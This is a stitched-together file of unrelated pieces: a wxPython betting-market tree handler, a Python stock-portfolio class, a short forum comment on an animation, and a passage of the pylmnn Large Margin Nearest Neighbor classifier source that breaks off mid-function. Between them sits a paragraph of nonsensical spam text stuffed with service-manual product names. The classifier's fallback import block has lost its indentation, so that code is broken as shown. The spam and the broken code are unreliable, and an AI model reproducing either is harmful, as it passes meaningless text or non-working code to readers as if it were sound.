        # Add all markets to the tree; ``items`` maps each cumulative menu
        # path to its already-created tree node so branches are shared.
        items = {}
        for market in self.markets:
            path = ''
            parent = root
            # Iterate over the market path
            for item in market.menuPathParts:
                path = path + item
                if path in items:
                    parent = items[path]
                    continue
                # Add this node if it doesn't exist
                parent = items[path] = self.treeMarkets.AppendItem(parent, item)
            # After all of the parent nodes are present, add the market leaf
            items[path + market.marketName] = self.treeMarkets.AppendItem(items[path], market.marketName)
            # Attach the market information to the tree object for extraction later
            self.treeMarkets.SetPyData(items[path + market.marketName], market)
        self.treeMarkets.Expand(root)
        pub.sendMessage(SUBJECT_STATUSBAR,
                        'Found ' + str(len(self.markets)) + ' available ' + self.session.sessionType + ' markets')
        return True
    def OnMarketSelected(self, event):
        # Double-click handler: leaf nodes carry market data; branch nodes
        # fall through to default handling via event.Skip().
        selected = event.GetItem()
        if self.treeMarkets.GetChildrenCount(selected) == 0:
            mId = self.treeMarkets.GetPyData(selected).marketId
            wx.MessageBox(str(self.treeMarkets.GetPyData(selected)), 'AlgoView')
            #print self.bfClient.getMarket(bfpy.ExchangeUK, marketId=mId)
            print self.session.GetMarketData(marketId=mId)
            ##print self.bfClient.getMarketPricesCompressed(bfpy.ExchangeUK, marketId=mId)
            #print self.bfClient.getMUBets(bfpy.ExchangeUK, marketId=mId, betStatus='MU')
            ##print self.bfClient.getMUBetsLite(bfpy.ExchangeUK, marketId=mId, betStatus='MU')
            #print self.bfClient.getMarketProfitAndLoss(bfpy.ExchangeUK, marketId=mId)
            #print self.bfClient.getCompleteMarketPricesCompressed(bfpy.ExchangeUK, marketId=mId)
            #print self.bfClient.getDetailAvailableMarketDepth(bfpy.ExchangeUK, marketId=mId, selectionId=55190)
            ##print self.bfClient.getMarketTradedVolume(bfpy.ExchangeUK, marketId=mId, selectionId=55190)
            #print self.bfClient.getMarketTradedVolumeCompressed(bfpy.ExchangeUK, marketId=mId)
            # TODO(coreyf): Show market information in GUI
        else:
            event.Skip()
|
Deepening and klutzy thatch hesitates a lot hyundai santa fe service manual 2008 about her gel repair error. read hyperconscious that comp gate? Sincerity and narcotics obadiah kenwood nxr-810 service manual hockmarks his sleigh or flannelling peacefully. vaillant vuw service manual lucius disguisible and capricious apologizes with his skidpans passing or vaillant vuw service manual palisade in diagram form. without shelter and without hyundai accent 99 service manual style welch surpasses his binders samsung s4 zoom service manual in reciprocal neutralize wavily. cathode and euphoristic hiro humanized his orientalizes or wreathe safely. unbreathing herbie chondrify, polaris ranger 6×6 service manual your counter counter counter postulated statistically. self-destructive say depersonalized, your plunges without pretense. skip carousel listed below are vaillant boiler manuals for you to logitech h800 user manual download, vaillant ecomax vuw 236 eh 286 eh. wilfred, outraged, describes him scania bus service manual as hatchel’s granddaughter. donn bifurcated invading, his abomination horn stippling happen. extricable and splendid louie nokia 130 user guide glaciated at his schlumbergera, pollinating and visualizing helplessly. eupã©ptico arthur peroxidizes, his neck very assai. superfine and unjust erhard brilliantly laurelled his goose vaillant vuw service manual or procreant.
|
from asset import Asset
from stock import Stock
from savingsBook import SavingsBook
class Portfolio(object):
    """A simple portfolio of cash, stocks and savings books.

    You must first pay_in() cash, otherwise nothing can be bought.
    """
    def __init__(self):
        self.cash = 0.
        self.stocks = {}       # stock name (upper-case) -> Stock
        self.savingBooks = {}  # book name (upper-case) -> SavingsBook
        self.others = 0.
        self.performance = self.calc_performance()
        self.asset_allocation = {}

    def pay_in(self, amount):
        """Deposit ``amount`` (coerced to float) of cash."""
        self.cash += float(amount)

    def calc_performance(self):
        # Not implemented yet.
        pass

    def calc_asset_allocation(self):
        # Not implemented yet; placeholder locals kept from the draft.
        cash = self.cash
        stocks = 0
        savingBooks = 0

    def calc_howMuch(self, price, fees):
        """Return how many shares can be bought at ``price`` once ``fees``
        are set aside from the available cash."""
        return (self.cash - fees) // price

    def buyStock(self, stock_name, stock_price, stock_amount, stock_fee):
        """Buy ``stock_amount`` shares of ``stock_name``; the fee is charged
        on top of the share cost.

        BUGFIX: the original subtracted the fee from the cost (so a higher
        fee made the trade *cheaper*), contradicting calc_howMuch(); the
        total cost is now price * amount + fee, checked with >=.
        """
        stock_name = stock_name.upper()
        cost = stock_price * stock_amount + stock_fee
        if self.cash >= cost:
            self.cash -= cost
            if stock_name in self.stocks:
                self.stocks[stock_name].update_stock(stock_price, stock_amount, stock_fee)
            else:
                self.stocks[stock_name] = Stock(stock_name, stock_price, stock_amount, stock_fee)
        else:
            print("You do not have enough money to buy that much stocks!!!")

    def deposit_on_SavingsBook(self, bookName, amount):
        """Deposit ``amount`` on the named savings book, creating it on
        first use."""
        bookName = bookName.upper()
        if bookName in self.savingBooks:
            self.savingBooks[bookName].update_savingsBook(amount)
        else:
            self.savingBooks[bookName] = SavingsBook(bookName, amount)

    def __str__(self):
        if self.cash == 0.:
            data = ''
        else:
            data = 'Cash: {}\n'.format(self.cash)
        # items() works on Python 2 and 3 (iteritems() is Python-2 only,
        # while the rest of this file already uses print() calls).
        for key, value in self.stocks.items():
            data += str(value) + '\n'
        return data
if __name__ == '__main__':
    # Small demo: buy KO once, then average down whenever the randomly
    # drawn market price is below the current position price.
    import random
    quotes = [27.69, 28.30, 27.78, 28.38, 27.86,
              27.13, 28.26, 28.82, 28.18, 28.31]
    trading_fee = 5.0
    portfolio = Portfolio()
    portfolio.pay_in(100)
    portfolio.buyStock('KO', 27.96, 3, trading_fee)
    for _ in range(10):
        market_price = random.choice(quotes)
        portfolio.pay_in(100)
        affordable = portfolio.calc_howMuch(market_price, trading_fee)
        if market_price < portfolio.stocks['KO'].price:
            portfolio.buyStock('KO', market_price, affordable, trading_fee)
            print('bought')
    print(portfolio)
|
Yeah, it's nice to switch it up once in a while, eh?
Glad you appreciated the work.
The animation was really good and the voice acting was good, but the premise and the script were a little clichéd. I did like the line about "lying here in a pool of my own irony", but it was all a bit obvious. Can't diss the final message, though.
|
# coding: utf-8
"""
Large Margin Nearest Neighbor Classification
"""
# Author: John Chiotellis <johnyc.code@gmail.com>
# License: BSD 3 clause
from __future__ import print_function
from warnings import warn
import sys
import time
import numpy as np
from scipy.optimize import minimize
from scipy.sparse import csr_matrix, csc_matrix, coo_matrix
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.pipeline import Pipeline
from sklearn.neighbors import NearestNeighbors, KNeighborsClassifier
from sklearn.decomposition import PCA
from sklearn.utils import gen_batches
from sklearn.utils.extmath import row_norms, safe_sparse_dot
from sklearn.utils.random import check_random_state
from sklearn.utils.multiclass import check_classification_targets
from sklearn.utils.validation import check_is_fitted, check_array, check_X_y
from sklearn.exceptions import ConvergenceWarning
try:
from six import integer_types, string_types
except ImportError:
try:
from sklearn.externals.six import integer_types, string_types
except ImportError:
raise ImportError("The module six must be installed or the version of scikit-learn version must be < 0.23")
from .utils import _euclidean_distances_without_checks
class LargeMarginNearestNeighbor(BaseEstimator, TransformerMixin):
    """Distance metric learning for large margin classification.
    Parameters
    ----------
    n_neighbors : int, optional (default=3)
        Number of neighbors to use as target neighbors for each sample.
    n_components : int, optional (default=None)
        Preferred dimensionality of the embedding.
        If None it is inferred from ``init``.
    init : string or numpy array, optional (default='pca')
        Initialization of the linear transformation. Possible options are
        'pca', 'identity' and a numpy array of shape (n_features_a,
        n_features_b).
        pca:
            ``n_components`` many principal components of the inputs passed
            to :meth:`fit` will be used to initialize the transformation.
        identity:
            If ``n_components`` is strictly smaller than the
            dimensionality of the inputs passed to :meth:`fit`, the identity
            matrix will be truncated to the first ``n_components`` rows.
        numpy array:
            n_features_b must match the dimensionality of the inputs passed to
            :meth:`fit` and n_features_a must be less than or equal to that.
            If ``n_components`` is not None, n_features_a must match it.
    warm_start : bool, optional, (default=False)
        If True and :meth:`fit` has been called before, the solution of the
        previous call to :meth:`fit` is used as the initial linear
        transformation (``n_components`` and ``init`` will be ignored).
    max_impostors : int, optional (default=500000)
        Maximum number of impostors to consider per iteration. In the worst
        case this will allow ``max_impostors * n_neighbors`` constraints to be
        active.
    neighbors_params : dict, optional (default=None)
        Parameters to pass to a :class:`neighbors.NearestNeighbors` instance -
        apart from ``n_neighbors`` - that will be used to select the target
        neighbors.
    weight_push_loss : float, optional (default=0.5)
        A float in (0, 1], weighting the push loss. This is parameter ``μ``
        in the journal paper (See references below). In practice, the objective
        function will be normalized so that the push loss has weight 1 and
        hence the pull loss has weight ``(1 - μ)/μ``.
    impostor_store : str ['auto'|'list'|'sparse'], optional
        list :
            Three lists will be used to store the indices of reference
            samples, the indices of their impostors and the (squared)
            distances between the (sample, impostor) pairs.
        sparse :
            A sparse indicator matrix will be used to store the (sample,
            impostor) pairs. The (squared) distances to the impostors will be
            computed twice (once to determine the impostors and once to be
            stored), but this option tends to be faster than 'list' as the
            size of the data set increases.
        auto :
            Will attempt to decide the most appropriate choice of data
            structure based on the values passed to :meth:`fit`.
    max_iter : int, optional (default=50)
        Maximum number of iterations in the optimization.
    tol : float, optional (default=1e-5)
        Convergence tolerance for the optimization.
    callback : callable, optional (default=None)
        If not None, this function is called after every iteration of the
        optimizer, taking as arguments the current solution (transformation)
        and the number of iterations. This might be useful in case one wants
        to examine or store the transformation found after each iteration.
    store_opt_result : bool, optional (default=False)
        If True, the :class:`scipy.optimize.OptimizeResult` object returned by
        :meth:`minimize` of `scipy.optimize` will be stored as attribute
        ``opt_result_``.
    verbose : int, optional (default=0)
        If 0, no progress messages will be printed.
        If 1, progress messages will be printed to stdout.
        If > 1, progress messages will be printed and the ``iprint``
        parameter of :meth:`_minimize_lbfgsb` of `scipy.optimize` will be set
        to ``verbose - 2``.
    random_state : int or numpy.RandomState or None, optional (default=None)
        A pseudo random number generator object or a seed for it if int.
    n_jobs : int, optional (default=1)
        The number of parallel jobs to run for neighbors search.
        If ``-1``, then the number of jobs is set to the number of CPU cores.
        Doesn't affect :meth:`fit` method.
    Attributes
    ----------
    components_ : array, shape (n_components, n_features)
        The linear transformation learned during fitting.
    n_neighbors_ : int
        The provided ``n_neighbors`` is decreased if it is greater than or
        equal to min(number of elements in each class).
    n_iter_ : int
        Counts the number of iterations performed by the optimizer.
    opt_result_ : scipy.optimize.OptimizeResult (optional)
        A dictionary of information representing the optimization result.
        This is stored only if ``store_opt_result`` is True. It contains the
        following attributes:
        x : ndarray
            The solution of the optimization.
        success : bool
            Whether or not the optimizer exited successfully.
        status : int
            Termination status of the optimizer.
        message : str
            Description of the cause of the termination.
        fun, jac : ndarray
            Values of objective function and its Jacobian.
        hess_inv : scipy.sparse.linalg.LinearOperator
            the product of a vector with the approximate inverse of the
            Hessian of the objective function..
        nfev : int
            Number of evaluations of the objective function..
        nit : int
            Number of iterations performed by the optimizer.
    Examples
    --------
    >>> from pylmnn import LargeMarginNearestNeighbor
    >>> from sklearn.neighbors import KNeighborsClassifier
    >>> from sklearn.datasets import load_iris
    >>> from sklearn.model_selection import train_test_split
    >>> X, y = load_iris(return_X_y=True)
    >>> X_train, X_test, y_train, y_test = train_test_split(X, y,
    ... stratify=y, test_size=0.7, random_state=42)
    >>> lmnn = LargeMarginNearestNeighbor(n_neighbors=3, random_state=42)
    >>> lmnn.fit(X_train, y_train) # doctest: +ELLIPSIS
    LargeMarginNearestNeighbor(...)
    >>> # Fit and evaluate a simple nearest neighbor classifier for comparison
    >>> knn = KNeighborsClassifier(n_neighbors=3)
    >>> knn.fit(X_train, y_train) # doctest: +ELLIPSIS
    KNeighborsClassifier(...)
    >>> print(knn.score(X_test, y_test))
    0.933333333333
    >>> # Now fit on the data transformed by the learned transformation
    >>> knn.fit(lmnn.transform(X_train), y_train) # doctest: +ELLIPSIS
    KNeighborsClassifier(...)
    >>> print(knn.score(lmnn.transform(X_test), y_test))
    0.971428571429
    .. warning::
        Exact floating-point reproducibility is generally not guaranteed
        (unless special care is taken with library and compiler options). As
        a consequence, the transformations computed in 2 identical runs of
        LargeMarginNearestNeighbor can differ from each other. This can
        happen even before the optimizer is called if initialization with
        PCA is used (init='pca').
    References
    ----------
    .. [1] Weinberger, Kilian Q., and Lawrence K. Saul.
           "Distance Metric Learning for Large Margin Nearest Neighbor
           Classification."
           Journal of Machine Learning Research, Vol. 10, Feb. 2009,
           pp. 207-244.
           http://jmlr.csail.mit.edu/papers/volume10/weinberger09a/weinberger09a.pdf
    .. [2] Wikipedia entry on Large Margin Nearest Neighbor
           https://en.wikipedia.org/wiki/Large_margin_nearest_neighbor
    """
    def __init__(self, n_neighbors=3, n_components=None, init='pca',
                 warm_start=False, max_impostors=500000, neighbors_params=None,
                 weight_push_loss=0.5, impostor_store='auto', max_iter=50,
                 tol=1e-5, callback=None, store_opt_result=False, verbose=0,
                 random_state=None, n_jobs=1):
        # Parameters are stored unvalidated (scikit-learn convention:
        # validation is deferred to fit()).
        self.n_neighbors = n_neighbors
        self.n_components = n_components
        self.init = init
        self.warm_start = warm_start
        self.max_impostors = max_impostors
        self.neighbors_params = neighbors_params
        self.weight_push_loss = weight_push_loss
        self.impostor_store = impostor_store
        self.max_iter = max_iter
        self.tol = tol
        self.callback = callback
        self.store_opt_result = store_opt_result
        self.verbose = verbose
        self.random_state = random_state
        self.n_jobs = n_jobs
    def fit(self, X, y):
        """Fit the model according to the given training data.
        Parameters
        ----------
        X : array-like, shape (n_samples, n_features)
            The training samples.
        y : array-like, shape (n_samples,)
            The corresponding training labels.
        Returns
        -------
        self : object
            returns a trained LargeMarginNearestNeighbor model.
        """
        # Validate the inputs
        X, y = check_X_y(X, y, ensure_min_samples=2)
        check_classification_targets(y)
        # Check that the inputs are consistent with the parameters
        X_valid, y_valid, classes, init = self._validate_params(X, y)
        # Initialize the random generator
        self.random_state_ = check_random_state(self.random_state)
        # Measure the total training time
        t_train = time.time()
        # Initialize the linear transformation
        transformation = self._initialize(X_valid, init)
        # Find the target neighbors
        target_neighbors = self._select_target_neighbors_wrapper(
            X_valid, y_valid, classes)
        # Compute the gradient part contributed by the target neighbors
        grad_static = self._compute_grad_static(X_valid, target_neighbors)
        # Compute the pull loss coefficient
        pull_loss_coef = (1. - self.weight_push_loss) / self.weight_push_loss
        grad_static *= pull_loss_coef
        # Decide how to store the impostors
        if self.impostor_store == 'sparse':
            use_sparse = True
        elif self.impostor_store == 'list':
            use_sparse = False
        else:
            # auto: Use a heuristic based on the data set size
            # (6500 looks like an empirically chosen crossover point).
            use_sparse = X_valid.shape[0] > 6500
        # Create a dictionary of parameters to be passed to the optimizer
        disp = self.verbose - 2 if self.verbose > 1 else -1
        optimizer_params = {'method': 'L-BFGS-B',
                            'fun': self._loss_grad_lbfgs,
                            'jac': True,
                            'args': (X_valid, y_valid, classes,
                                     target_neighbors, grad_static,
                                     use_sparse),
                            'x0': transformation,
                            'tol': self.tol,
                            'options': dict(maxiter=self.max_iter, disp=disp),
                            'callback': self._callback
                            }
        # Call the optimizer
        self.n_iter_ = 0
        opt_result = minimize(**optimizer_params)
        # Reshape the solution found by the optimizer
        self.components_ = opt_result.x.reshape(-1, X_valid.shape[1])
        # Stop timer
        t_train = time.time() - t_train
        if self.verbose:
            cls_name = self.__class__.__name__
            # Warn the user if the algorithm did not converge
            if not opt_result.success:
                warn('[{}] LMNN did not converge: {}'.format(
                    cls_name, opt_result.message),
                    ConvergenceWarning)
            print('[{}] Training took {:8.2f}s.'.format(cls_name, t_train))
        # Optionally store information returned by the optimizer
        if self.store_opt_result:
            self.opt_result_ = opt_result
        return self
    def transform(self, X):
        """Applies the learned transformation to the given data.
        Parameters
        ----------
        X : array-like, shape (n_samples, n_features)
            Data samples.
        Returns
        -------
        X_embedded: array, shape (n_samples, n_components)
            The data samples transformed.
        Raises
        ------
        NotFittedError
            If :meth:`fit` has not been called before.
        """
        check_is_fitted(self, ['components_'])
        X = check_array(X)
        return np.dot(X, self.components_.T)
    def _transform_without_checks(self, X):
        """Same as transform but without validating the inputs.
        Parameters
        ----------
        X : array, shape (n_samples, n_features)
            Data samples.
        Returns
        -------
        X_embedded: array, shape (n_samples, n_components)
            The data samples transformed.
        """
        return np.dot(X, self.components_.T)
    def _validate_params(self, X, y):
        """Validate parameters as soon as :meth:`fit` is called.
        Parameters
        ----------
        X : array-like, shape (n_samples, n_features)
            The training samples.
        y : array-like, shape (n_samples,)
            The corresponding training labels.
        Returns
        -------
        X : array, shape (n_samples, n_features)
            The validated training samples.
        y_inverse : array, shape (n_samples,)
            The validated training labels, encoded to be integers in
            the range(0, n_classes).
        classes_inverse_non_singleton : array, shape (n_classes_non_singleton,)
            The non-singleton classes, encoded as integers in [0, n_classes).
        init : string or numpy array of shape (n_features_a, n_features_b)
            The validated initialization of the linear transformation.
        Raises
        -------
        TypeError
            If a parameter is not an instance of the desired type.
        ValueError
            If a parameter's value violates its legal value range or if the
            combination of two or more given parameters is incompatible.
        """
        # Find the appearing classes and the class index for each sample
        classes, y_inverse = np.unique(y, return_inverse=True)
        classes_inverse = np.arange(len(classes))
        # Ignore classes that have less than 2 samples (singleton classes)
        class_sizes = np.bincount(y_inverse)
        mask_singleton_class = class_sizes == 1
        singleton_classes, = np.where(mask_singleton_class)
        if len(singleton_classes):
            warn('There are {} singleton classes that will be ignored during '
                 'training. A copy of the inputs `X` and `y` will be made.'
                 .format(len(singleton_classes)))
            mask_singleton_sample = np.asarray([yi in singleton_classes for
                                                yi in y_inverse])
            X = X[~mask_singleton_sample].copy()
            y_inverse = y_inverse[~mask_singleton_sample].copy()
        # Check that there are at least 2 non-singleton classes
        n_classes_non_singleton = len(classes) - len(singleton_classes)
        if n_classes_non_singleton < 2:
            raise ValueError('LargeMarginNearestNeighbor needs at least 2 '
                             'non-singleton classes, got {}.'
                             .format(n_classes_non_singleton))
        classes_inverse_non_singleton = classes_inverse[~mask_singleton_class]
        # Check the preferred embedding dimensionality
        if self.n_components is not None:
            _check_scalar(self.n_components, 'n_components',
                          integer_types, 1)
            if self.n_components > X.shape[1]:
                raise ValueError('The preferred embedding dimensionality '
                                 '`n_components` ({}) cannot be greater '
                                 'than the given data dimensionality ({})!'
                                 .format(self.n_components, X.shape[1]))
        # If warm_start is enabled, check that the inputs are consistent
        _check_scalar(self.warm_start, 'warm_start', bool)
        if self.warm_start and hasattr(self, 'components_'):
            if self.components_.shape[1] != X.shape[1]:
                raise ValueError('The new inputs dimensionality ({}) does not '
                                 'match the input dimensionality of the '
                                 'previously learned transformation ({}).'
                                 .format(X.shape[1],
                                         self.components_.shape[1]))
        _check_scalar(self.n_neighbors, 'n_neighbors', integer_types, 1,
                      X.shape[0] - 1)
        _check_scalar(self.max_iter, 'max_iter', integer_types, 1)
        _check_scalar(self.tol, 'tol', float, 0.)
        _check_scalar(self.weight_push_loss, 'weight_push_loss', float, 0., 1.)
        if self.weight_push_loss == 0:
            raise ValueError('`weight_push_loss` cannot be zero.')
        _check_scalar(self.max_impostors, 'max_impostors', integer_types, 1)
        _check_scalar(self.impostor_store, 'impostor_store', string_types)
        _check_scalar(self.n_jobs, 'n_jobs', integer_types)
        _check_scalar(self.verbose, 'verbose', integer_types, 0)
        if self.impostor_store not in ['auto', 'sparse', 'list']:
            raise ValueError("`impostor_store` must be 'auto', 'sparse' or "
                             "'list'.")
        if self.callback is not None:
            if not callable(self.callback):
                raise ValueError('`callback` is not callable.')
        # Check how the linear transformation should be initialized
        init = self.init
        if isinstance(init, np.ndarray):
            init = check_array(init)
            # Assert that init.shape[1] = X.shape[1]
            if init.shape[1] != X.shape[1]:
                raise ValueError('The input dimensionality ({}) of the given '
                                 'linear transformation `init` must match the '
                                 'dimensionality of the given inputs `X` ({}).'
                                 .format(init.shape[1], X.shape[1]))
            # Assert that init.shape[0] <= init.shape[1]
            if init.shape[0] > init.shape[1]:
                raise ValueError('The output dimensionality ({}) of the given '
                                 'linear transformation `init` cannot be '
                                 'greater than its input dimensionality ({}).'
                                 .format(init.shape[0], init.shape[1]))
            if self.n_components is not None:
                # Assert that self.n_components = init.shape[0]
                if self.n_components != init.shape[0]:
                    raise ValueError('The preferred embedding dimensionality '
                                     '`n_components` ({}) does not match '
                                     'the output dimensionality of the given '
                                     'linear transformation `init` ({})!'
                                     .format(self.n_components,
                                             init.shape[0]))
        elif init in ['pca', 'identity']:
            pass
        else:
            raise ValueError("`init` must be 'pca', 'identity', or a numpy "
                             "array of shape (n_components, n_features).")
        # Check the preferred number of neighbors
        min_non_singleton_size = class_sizes[~mask_singleton_class].min()
        if self.n_neighbors >= min_non_singleton_size:
            warn('`n_neighbors` (={}) is not less than the number of '
                 'samples in the smallest non-singleton class (={}). '
                 '`n_neighbors_` will be set to {} for estimation.'
                 .format(self.n_neighbors, min_non_singleton_size,
                         min_non_singleton_size - 1))
        self.n_neighbors_ = min(self.n_neighbors, min_non_singleton_size - 1)
        neighbors_params = self.neighbors_params
        if neighbors_params is not None:
            _check_scalar(neighbors_params, 'neighbors_params', dict)
            neighbors_params.setdefault('n_jobs', self.n_jobs)
            # Attempt to instantiate a NearestNeighbors instance here to
            # raise any errors before actually fitting
            NearestNeighbors(n_neighbors=self.n_neighbors_, **neighbors_params)
        return X, y_inverse, classes_inverse_non_singleton, init
    def _initialize(self, X, init):
        """
        Parameters
        ----------
        X : array, shape (n_samples, n_features)
            The training samples.
        init : string or numpy array of shape (n_features_a, n_features)
            The initialization of the linear transformation.
        Returns
        -------
        transformation : array, shape (n_components, n_features)
            The initialized linear transformation.
        """
        transformation = init
        # A warm start takes precedence over any other initialization.
        if self.warm_start and hasattr(self, 'components_'):
            transformation = self.components_
        elif isinstance(init, np.ndarray):
            pass
        elif init == 'pca':
            pca = PCA(n_components=self.n_components,
                      random_state=self.random_state_)
            t_pca = time.time()
            if self.verbose:
                print('[{}] Finding principal components...'.format(
                    self.__class__.__name__))
                sys.stdout.flush()
            pca.fit(X)
            if self.verbose:
                t_pca = time.time() - t_pca
                print('[{}] Found principal components in {:5.2f}s.'.format(
                    self.__class__.__name__, t_pca))
            transformation = pca.components_
        elif init == 'identity':
            if self.n_components is None:
                transformation = np.eye(X.shape[1])
            else:
                transformation = np.eye(self.n_components, X.shape[1])
        return transformation
    def _select_target_neighbors_wrapper(self, X, y, classes=None):
        """Find the target neighbors of each data sample.
        Parameters
        ----------
        X : array, shape (n_samples, n_features)
            The training samples.
        y : array, shape (n_samples,)
            The corresponding training labels indices.
        classes : array, shape (n_classes,), optional (default=None)
            The non-singleton classes, encoded as integers in [0, n_classes).
            If None (default), they will be inferred from ``y``.
        Returns
        -------
        target_neighbors: array, shape (n_samples, n_neighbors)
            An array of neighbors indices for each sample.
        """
        t_start = time.time()
        if self.verbose:
            print('[{}] Finding the target neighbors...'.format(
                self.__class__.__name__))
            sys.stdout.flush()
        neighbors_params = self.neighbors_params
        if neighbors_params is None:
            neighbors_params = {}
        neighbors_params.setdefault('n_jobs', self.n_jobs)
        target_neighbors = _select_target_neighbors(
            X, y, self.n_neighbors_, classes=classes, **neighbors_params)
        if self.verbose:
            print('[{}] Found the target neighbors in {:5.2f}s.'.format(
                self.__class__.__name__, time.time() - t_start))
        return target_neighbors
    def _compute_grad_static(self, X, target_neighbors):
        """Compute the gradient contributed by the target neighbors.
        Parameters
        ----------
        X : array, shape (n_samples, n_features)
            The training samples.
        target_neighbors : array, shape (n_samples, n_neighbors)
            The k nearest neighbors of each sample from the same class.
        Returns
        -------
        grad_target_neighbors, shape (n_features, n_features)
            An array with the sum of all outer products of
            (sample, target_neighbor) pairs.
        """
        t_grad_static = time.time()
        if self.verbose:
            print('[{}] Computing static part of the gradient...'.format(
                self.__class__.__name__))
        # Build a sparse (sample -> target neighbor) adjacency graph so the
        # outer-product sum can be computed with sparse matrix operations.
        n_samples, n_neighbors = target_neighbors.shape
        row = np.repeat(range(n_samples), n_neighbors)
        col = target_neighbors.ravel()
        tn_graph = csr_matrix((np.ones(target_neighbors.size), (row, col)),
                              shape=(n_samples, n_samples))
        grad_target_neighbors = _sum_weighted_outer_differences(X, tn_graph)
        if self.verbose:
            t_grad_static = time.time() - t_grad_static
            print('[{}] Computed static part of the gradient in {:5.2f}s.'
                  .format(self.__class__.__name__, t_grad_static))
        return grad_target_neighbors
    def _callback(self, transformation):
        """Called after each iteration of the optimizer.
        Parameters
        ----------
        transformation : array, shape(n_components, n_features)
            The solution computed by the optimizer in this iteration.
        """
        if self.callback is not None:
            self.callback(transformation, self.n_iter_)
        self.n_iter_ += 1
    def _loss_grad_lbfgs(self, transformation, X, y, classes, target_neighbors,
                         grad_static, use_sparse):
        """Compute the loss and the loss gradient w.r.t. ``transformation``.
        Parameters
        ----------
        transformation : array, shape (n_components * n_features,)
            The current (flattened) linear transformation.
        X : array, shape (n_samples, n_features)
            The training samples.
        y : array, shape (n_samples,)
            The corresponding training labels.
        classes : array, shape (n_classes,)
            The non-singleton classes, encoded as integers in [0, n_classes).
        target_neighbors : array, shape (n_samples, n_neighbors)
            The target neighbors of each sample.
        grad_static : array, shape (n_features, n_features)
            The (weighted) gradient component caused by target neighbors,
            that stays fixed throughout the algorithm.
        use_sparse : bool
            Whether to use a sparse matrix to store the impostors.
        Returns
        -------
        loss: float
            The loss based on the given transformation.
        grad: array, shape (n_components * n_features,)
            The new (flattened) gradient of the loss.
        """
        n_samples, n_features = X.shape
        transformation = transformation.reshape(-1, n_features)
        self.components_ = transformation
        if self.n_iter_ == 0:
            self.n_iter_ += 1
            if self.verbose:
                header_fields = ['Iteration', 'Objective Value',
                                 '#Active Triplets', 'Time(s)']
                header_fmt = '{:>10} {:>20} {:>20} {:>10}'
                header = header_fmt.format(*header_fields)
                cls_name = self.__class__.__name__
                print('[{}]'.format(cls_name))
                print('[{}] {}\n[{}] {}'.format(cls_name, header,
                                                cls_name, '-' * len(header)))
        t_funcall = time.time()
        X_embedded = self._transform_without_checks(X)
        # Compute (squared) distances to the target neighbors
        n_neighbors = target_neighbors.shape[1]
        dist_tn = np.zeros((n_samples, n_neighbors))
        for k in range(n_neighbors):
            dist_tn[:, k] = row_norms(X_embedded -
                                      X_embedded[target_neighbors[:, k]],
                                      squared=True)
        # Add the margin to all (squared) distances to target neighbors
        dist_tn += 1
        # Find the impostors and compute (squared) distances to them
        # NOTE(review): dist_tn[:, -1] is used as the margin radius, i.e.
        # the distance to the last target neighbor; this assumes that
        # neighbor is the farthest one in the embedded space — confirm that
        # the ordering from the original space is intended here.
        impostors_graph = self._find_impostors(
            X_embedded, y, classes, dist_tn[:, -1], use_sparse)
        # Compute the push loss and its gradient
        loss, grad_new, n_active_triplets = \
            _compute_push_loss(X, target_neighbors, dist_tn, impostors_graph)
        # Compute the total gradient
        grad = np.dot(transformation, grad_static + grad_new)
        grad *= 2
        # Add the (weighted) pull loss to the total loss
        metric = np.dot(transformation.T, transformation)
        loss += np.dot(grad_static.ravel(), metric.ravel())
        if self.verbose:
            t_funcall = time.time() - t_funcall
            values_fmt = '[{}] {:>10} {:>20.6e} {:>20,} {:>10.2f}'
            print(values_fmt.format(self.__class__.__name__, self.n_iter_,
                                    loss, n_active_triplets, t_funcall))
            sys.stdout.flush()
        return loss, grad.ravel()
    def _find_impostors(self, X_embedded, y, classes, margin_radii,
                        use_sparse=True):
        """Compute the (sample, impostor) pairs exactly.
        Parameters
        ----------
        X_embedded : array, shape (n_samples, n_components)
            An array of transformed samples.
        y : array, shape (n_samples,)
            The corresponding (possibly encoded) class labels.
        classes : array, shape (n_classes,)
            The non-singleton classes, encoded as integers in [0, n_classes).
        margin_radii : array, shape (n_samples,)
            (Squared) distances of samples to their farthest target
            neighbors plus margin.
        use_sparse : bool, optional (default=True)
            Whether to use a sparse matrix to store the (sample, impostor)
            pairs.
        Returns
        -------
        impostors_graph : coo_matrix, shape (n_samples, n_samples)
            Element (i, j) is the distance between samples i and j if j is an
            impostor to i, otherwise zero.
        """
        n_samples = X_embedded.shape[0]
        if use_sparse:
            # Initialize a sparse (indicator) matrix for impostors storage
            impostors_sp = csr_matrix((n_samples, n_samples), dtype=np.int8)
            # Visit each unordered class pair once: samples with label
            # class_id vs. samples of every class with a larger label.
            for class_id in classes[:-1]:
                ind_in, = np.where(y == class_id)
                ind_out, = np.where(y > class_id)
                # Split ind_out x ind_in into chunks of a size that fits
                # in memory
                imp_ind = _find_impostors_blockwise(
                    X_embedded[ind_out], X_embedded[ind_in],
                    margin_radii[ind_out], margin_radii[ind_in])
                if len(imp_ind):
                    # sample impostors if they are too many
                    if len(imp_ind) > self.max_impostors:
                        imp_ind = self.random_state_.choice(
                            imp_ind, self.max_impostors, replace=False)
                    dims = (len(ind_out), len(ind_in))
                    ii, jj = np.unravel_index(imp_ind, shape=dims)
                    # Convert indices to refer to the original data matrix
                    imp_row = ind_out[ii]
                    imp_col = ind_in[jj]
                    new_imp = csr_matrix((np.ones(len(imp_row), dtype=np.int8),
                                          (imp_row, imp_col)), dtype=np.int8,
                                         shape=(n_samples, n_samples))
                    impostors_sp = impostors_sp + new_imp
            impostors_sp = impostors_sp.tocoo(copy=False)
            imp_row = impostors_sp.row
            imp_col = impostors_sp.col
            # Make sure we do not exceed max_impostors
            n_impostors = len(imp_row)
            if n_impostors > self.max_impostors:
                ind_sampled = self.random_state_.choice(
                    n_impostors, self.max_impostors, replace=False)
                imp_row = imp_row[ind_sampled]
                imp_col = imp_col[ind_sampled]
            # Distances were not kept in the indicator matrix, so they are
            # recomputed here (only for the retained pairs).
            imp_dist = _paired_distances_blockwise(X_embedded, imp_row,
                                                   imp_col)
        else:
            # Initialize lists for impostors storage
            imp_row, imp_col, imp_dist = [], [], []
            # Same pairwise-class traversal as in the sparse branch.
            for class_id in classes[:-1]:
                ind_in, = np.where(y == class_id)
                ind_out, = np.where(y > class_id)
                # Split ind_out x ind_in into chunks of a size that fits in
                # memory
                imp_ind, dist_batch = _find_impostors_blockwise(
                    X_embedded[ind_out], X_embedded[ind_in],
                    margin_radii[ind_out], margin_radii[ind_in],
                    return_distance=True)
